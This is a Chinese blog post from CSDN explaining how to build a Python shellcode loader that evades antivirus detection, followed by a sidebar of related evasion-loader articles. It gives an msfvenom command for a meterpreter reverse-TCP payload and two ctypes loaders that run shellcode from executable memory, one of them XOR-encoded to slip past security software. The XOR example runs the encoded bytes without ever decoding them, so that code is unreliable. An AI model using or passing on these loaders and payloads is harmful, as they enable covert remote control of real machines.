Python实现免杀Shellcode加载器编写

已于 2022-12-11 02:59:55 修改
阅读量965 收藏 1
点赞数
文章标签: 网络 python
于 2022-12-11 02:49:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56187372/article/details/128271427
版权

在渗透测试和攻击防御中,Shellcode是一种常见的技术手段。Shellcode通常用于在攻击者控制的环境中执行恶意代码,实现对操作系统内核的控制。然而,由于Shellcode的特殊性质,通常会被安全软件检测并阻止。因此,攻击者需要通过免杀技术来避免安全软件的检测,从而实现对目标系统的控制。

Python是一种流行的编程语言,可以用于实现各种功能。在本文中,我们将使用Python来实现免杀加载Shellcode的方法。首先,我们需要获取需要执行的Shellcode。通常,我们可以使用metasploit等工具生成Shellcode,并将其转换为字节序列。例如,我们可以使用以下命令生成一段Windows x86 Shellcode:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f python

我们可以使用Python的ctypes库来加载并执行Shellcode。首先,我们需要创建一个内存空间来存储Shellcode,然后使用ctypes库中的memmove函数将Shellcode复制到该空间中。最后,我们可以调用ctypes库中的CreateThread函数,创建一个新线程来执行Shellcode。代码示例如下:

from ctypes import *

# 获取需要执行的Shellcode
shellcode = b""

# 创建内存空间并复制Shellcode
ptr = c_void_p(0)
size = len(shellcode)
VirtualAlloc = windll.kernel32.VirtualAlloc
VirtualAlloc.restype = POINTER(c_void_p)
ptr = VirtualAlloc(c_int(0),c_int(size),c_int(0x3000),c_int(0x40))
memmove(ptr, shellcode, size)

# 创建线程并执行Shellcode
thread_id = c_ulong(0)
shellcode_addr = c_void_p(ptr)
CreateThread = windll.kernel32.CreateThread
CreateThread.restype = POINTER(c_void_p)
h_thread = CreateThread(c_int(0),c_int(0),shellcode_addr,c_int(0),c_int(0),pointer(thread_id))

# 等待线程结束
WaitForSingleObject = windll.kernel32.WaitForSingleObject
WaitForSingleObject(c_int(h_thread), c_int(-1))

当然上面的是最简单的实现方法,下面我们加强难度!
在实现免杀加载Shellcode时,除了使用Python进行代码编写外,还可以使用其他技术来避免安全软件的检测。例如,可以使用加密、混淆等手段来提高Shellcode的难度,从而避免被安全软件识别。

下面是一个示例代码,使用XOR加密对Shellcode进行加密,并使用Python实现免杀加载:

from ctypes import *

# 获取需要执行的Shellcode
shellcode = b""

# 使用XOR加密对Shellcode进行加密
key = b"\x01\x02\x03\x04\x05"
enc_shellcode = b""
for i in range(0, len(shellcode)):
    enc_shellcode += bytes([shellcode[i] ^ key[i % len(key)]])

# 创建内存空间并复制加密后的Shellcode
ptr = c_void_p(0)
size = len(enc_shellcode)
VirtualAlloc = windll.kernel32.VirtualAlloc
VirtualAlloc.restype = POINTER(c_void_p)
ptr = VirtualAlloc(c_int(0),c_int(size),c_int(0x3000),c_int(0x40))
memmove(ptr, enc_shellcode, size)

# 创建线程并执行Shellcode
thread_id = c_ulong(0)
enc_shellcode_addr = c_void_p(ptr)
CreateThread = windll.kernel32.CreateThread
CreateThread.restype = POINTER(c_void_p)
h_thread = CreateThread(c_int(0),c_int(0),enc_shellcode_addr,c_int(0),c_int(0),pointer(thread_id))

# 等待线程结束
WaitForSingleObject = windll.kernel32.WaitForSingleObject
WaitForSingleObject(c_int(h_thread), c_int(-1))

通过使用XOR加密,可以较好地避免安全软件的检测。但是,不同的安全软件可能采用不同的检测算法,因此,在实际使用时,还需要根据实际情况调整免杀策略。

留言互动

Dantiao搞安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
绕过AV:免杀shellcode加载
03-04
条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go...
R语言利用arima模型的时间序列分析-代码
today__present的博客
10-03 2076
代码如下 library(readxl) library(forecast) dat <- read_excel("rawdatacompet.xlsx",sheet=1,na="NA") #对数据进行处理,取出待分析的数据并转化 series1 <- dat[,1] series1 <- series1[1:60,] series1 <- ts(series1) series1 <- as.double(series1) #自动分析适合该数据的参数值,并进行预测 fore &
python3 unittest模块源码解析(四) --- 加载loader
qq_41437305的博客
07-27 2886
一、loader简介 照惯例,引用官方文档的说明: TheTestLoaderclass is used to create test suites from classes and modules. TestLoader类是用来从类与模块中创建测试套件(即suite)。 二、TestLoader类 1、加载测试的几个方法 loader中用来加载测试的最基本方法是lo...
c++之shellcode加载
qq_44657899的博客
05-26 3315
文章目录VirtualAlloc申请内存堆 VirtualAlloc申请内存 #include <windows.h> #include <iostream> #include <time.h> #pragma comment (lib, "winmm.lib") #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") void startShellCode() { unsi
shellcode加载--从入门到放弃
Mccc_li的博客
03-12 3406
test https://www.freebuf.com/articles/system/133990.html https://www.freebuf.com/sectool/254891.html https://www.freebuf.com/articles/network/249014.html https://www.cnblogs.com/-qing-/p/12234148.html#_lab2_1_1 https://www.freebuf.com/articles/system/22823
python加载shellcode免杀
qq_43884092的博客
10-12 827
编码,生成混淆后的shellcode加载,写入文件a.txt。可以过卡巴斯基静态和动态特征正常上线(这里使用的payload为。可以过火绒静态和动态特征正常上线,但无法过360和卡巴斯基。将加密和编码后的shellcode加载代码通过网络下载。pyinstaller进行打包(打包前删除所有注释)编码,生成混淆后的shellcode加载。可以过360静态和动态特征正常上线。可以过360静态和动态特征正常上线。可以过火绒静态和动态特征正常上线。可以过火绒静态和动态特征正常上线。
利用Python执行ShellCode
2201_75774378的博客
05-05 573
D:\网安\sike\ShellCode_Loader>Shellcode_encryption.exe shellcode_xor.c。将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = ‘密文Shellcode’ 处。运行:Shellcode_encryption.exe payload.c 对ShellCode代码进行加密处理。使用Python 64位版加载。生成x64位的ShellCode。使用64位版Python加载Python加载实现免杀
Python免杀技术详解
weixin_68789096的博客
11-02 1006
网络安全领域,Shellcode加载通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode加载免杀技术。我们可以利用Python中的ctypes库实现shellcode加载,ctypes是Python的外部函数库。
总结加载Shellcode的各种方式(更新中!)
xf555er的博客
05-24 2127
异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的 APC 队列,并在适当的时机触发队列中挂起的函数。APC 队列通常用于实现线程间的异步通信、定时回调以及异步 I/O 操作。内核模式 APC:由内核代码发起,通常用于处理内核级别的异步操作,如异步 I/O 完成。用户模式 APC:由用户代码发起,允许用户态应用程序将特定函数插入到线程的 APC 队列中,以便在线程上下文中异步执行。
免杀之浅谈shellcode加载
qq_46217803的博客
12-26 1674
VirtualAlloc:申请一个虚拟地址的空间,可以说为虚拟空间到物理空间的映射,简单来说,在虚拟空间操作,物理空间就会自动的分配物理地址。可以直接在内存中运行,不需要一个完整的pe结构,简单来说,内存能执行就能运行,没有啥依赖的“生存环境”设置一个指针类型的,也可以是别的,这里设置成NULL,这样系统会自动的去分配一个空间区域。就是一个类型属性,主要是内存分配的类型属性,可以去百度的,这里设置了两个值,去了解一下。还是以上的shellcode,本地生成的,用的是Visual Studio。
一款基于pythonshellcode免杀加载+源代码+文档说明
12-01
## 免杀测试 **过火绒** ![](picture/image-20231019203001783.png) **过defender** ![](picture/image-20231019204156899.png) **动态执行** ![image-20231020182032610](picture/image-20231020182032610....
利用Python反序列化运行加载实现免杀1
08-03
前言前几天在看Pythonshellcode加载,在网上找了一个,结果加载自身就过不了火绒,测试发现是火绒对关键语句进行了识别。所以我们要想办法去掉加载
通过Python实现Payload分离免杀过程详解
01-19
实现: msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x...
基于Java实现Shellcode加载源码+项目说明.zip
最新发布
12-29
基于Java实现Shellcode加载源码+项目说明.zip基于Java实现Shellcode加载源码+项目说明.zip基于Java实现Shellcode加载源码+项目说明.zip基于Java实现Shellcode加载源码+项目说明.zip
python加载_类加载详解
weixin_35762258的博客
02-04 677
加载是负责将可能是网络上、也可能是磁盘上的class文件加载到内存中。并为其生成对应的java.lang.class对象。一旦一个类被载入JVM了,同一个类就不会被再次加载。那么怎样才算是同一个类?在JAVA中一个类用其全限定类名(包名和类名)作为其唯一标识,但是在JVM中,一个类用其全限定类名和其类加载作为其唯一标识。也就是说,在JAVA中的同一个类,如果用不同的类加载加载,则生成的cl...
学习笔记1:python实现shellcode加载
nglj9527的博客
01-02 5729
python实现shellcode加载名词解释代码 名词解释 shellcode:一段可以由电脑直接执行的机码,执行后可以搭建起stranger。 加载:将shellcode加载进内存,并开始执行的程序。 代码 import ctypes import base64 import requests shellcode = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\
ShellCode免杀的一些方法
qq_68890680的博客
06-26 531
申请内存空间:VirtualAlloc(在调用进程的虚拟地址空间中保留、提交或更改页面区域的状态分配的内存初始化为零)、VirtualAlloc2(进程注入:在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。该函数将其分配的内存初始化为零)、VirtualAllocEx(进程注入:在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。常见的加密解密方式:AES加密、hex加密、XOR+base64加密、Base85+XOR+RC4。加载方式:基础加载,纤程加载,远程加载
Shellcode免杀技术的探索与应对策略
weixin_51030879的博客
07-07 579
随着网络安全威胁的不断增加,攻击者也在不断寻找新的方法绕过安全防护措施,其中之一就是通过免杀技术来隐藏和执行恶意代码。而shellcode作为一种常见的恶意代码执行方式,也成为了攻击者进行免杀的重要手段之一。本文将探索shellcode免杀技术的原理和常见策略,并提供一些应对策略。shellcode免杀技术的不断进化给网络安全带来了新的挑战,但同时也激发了安全研究人员和防御团队不断创新和提供新的防御策略的动力。
python编写shellcode加载
02-06
Python编写 shellcode 加载的步骤如下: 1. 定义一个字符串变量,并将 shellcode 存储在该字符串中。 2. 使用 ctypes 库中的函数 `create_string_buffer()` 创建一个内存缓冲区。 3. 将 shellcode 复制到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dantiao搞安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值